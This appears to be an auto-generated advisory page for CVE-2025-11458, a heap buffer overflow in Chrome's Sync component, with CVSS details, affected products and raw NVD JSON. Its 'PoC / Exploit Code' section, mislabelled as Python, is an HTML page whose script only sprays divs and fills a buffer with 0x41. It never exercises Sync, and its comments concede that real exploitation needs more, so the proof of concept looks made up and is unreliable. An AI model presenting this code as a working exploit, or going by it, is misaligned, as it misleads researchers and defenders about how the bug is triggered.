Security Vulnerability Report
中文
CVE-2025-11458 CVSS 8.1 HIGH

CVE-2025-11458

Published: 2025-11-06 23:15:35
Last Modified: 2025-11-25 14:49:31

Description

Heap buffer overflow in Sync in Google Chrome prior to 141.0.7390.65 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 141.0.7390.65

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-11458 PoC - Heap Buffer Overflow in Google Chrome Sync // This PoC demonstrates the vulnerability trigger mechanism <!DOCTYPE html> <html> <head> <title>CVE-2025-11458 PoC</title> </head> <body> <h1>CVE-2025-11458 - Chrome Sync Heap Buffer Overflow</h1> <p>Vulnerable versions: Google Chrome < 141.0.7390.65</p> <script> // Trigger mechanism for Sync component buffer overflow // This triggers the vulnerability in Chrome Sync functionality function triggerVulnerability() { // Attempt to trigger sync with malformed data // The actual exploitation requires specific heap grooming const payload = 'A'.repeat(65536); // Large payload to trigger overflow // Create conditions for heap spray and overflow for (let i = 0; i < 100; i++) { const element = document.createElement('div'); element.id = 'spray_' + i; document.body.appendChild(element); } // Trigger sync with crafted data try { // This simulates the data handling that leads to overflow const data = new ArrayBuffer(1024 * 1024); // 1MB buffer const view = new Uint8Array(data); view.fill(0x41); // Fill with 'A' // Force garbage collection if available if (window.gc) window.gc(); } catch (e) { console.log('Error: ' + e.message); } } // Execute on page load window.onload = function() { setTimeout(triggerVulnerability, 1000); }; </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11458", "sourceIdentifier": "[email protected]", "published": "2025-11-06T23:15:35.200", "lastModified": "2025-11-25T14:49:31.103", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Heap buffer overflow in Sync in Google Chrome prior to 141.0.7390.65 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "141.0.7390.65", "matchCriteriaId": "31C003EA-49A0-4743-AE47-02EF9C1C479B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/443196747", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}